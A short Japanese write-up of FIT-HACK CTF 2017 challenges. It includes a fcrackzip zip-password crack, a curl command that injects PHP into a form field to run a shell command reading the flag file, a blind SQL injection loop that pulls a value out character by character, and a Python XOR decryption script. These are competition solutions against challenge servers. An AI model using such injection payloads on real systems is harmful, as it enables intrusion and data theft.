FIT-HACK CTF 2017
cryptoはかなりのguessing CTFだった。
- 前処理: https://twitter.com/elliptic_shiho/status/852779435983986691
- it’s_solvable: https://rawsec.ml/en/FIT-HACK-2017-write-ups/#100-it-s-solvable-crypto
- bignumber: https://twitter.com/_n_ari/status/852777396302299136
flag
$ fcrackzip -u -l 0-4 flag.zip
PASSWORD FOUND!!!!: pw == 1864
fcrackzip -u -l 0-4 flag.zip 5.96s user 5.98s system 6% cpu 3:14.71 total
Sorry
HTMLとしてinjectionできるなあと思っていたらphpとしてinjectionできていた。
$ curl https://sorry.problem.ctf.nw.fit.ac.jp/in.php -F etc=$' <?php\necho `cat /var/tmp/flag`;\n?>'
FIT{fdsa__dasdas_32fa}
FIT{fdsa__dasdas_32fa} <?php
echo `cat /var/tmp/flag`;
?>:mail@example.com <br>Saved it thank you!!
Let’s login
SQLi
$ s=9n89_ ; while true ; do for c in `seq 0 9` `alpha` _ ; do echo $s$c ; if curl -s https://login.problem.ctf.nw.fit.ac.jp/login.php -F name=name -F pass="' union select name, pass from user where pass like 'FIT{$s$c%' -- " | grep mes1 ; then s=$s$c ; break ; fi ; done ; done
FIT{9n89_y0u3u_9a811}
simple cipher
普通に逆関数を書くだけ
#!/usr/bin/env python3
import binascii
enc_mes = '0c157e2b7f7b515e075b391f143200080a00050316322b272e0d525017562e73183e3a0d564f6718'
key = 'J2msBeG8'
m = list(binascii.unhexlify(enc_mes))
mes = [ None ] * len(m)
j = 0
for a in range(len(key)):
i = a
for b in range(len(m) // len(key)):
mes[i] = chr(m[j] ^ ord(key[a]))
j += 1
i += len(key)
mes = ''.join(mes).rstrip()
print(mes)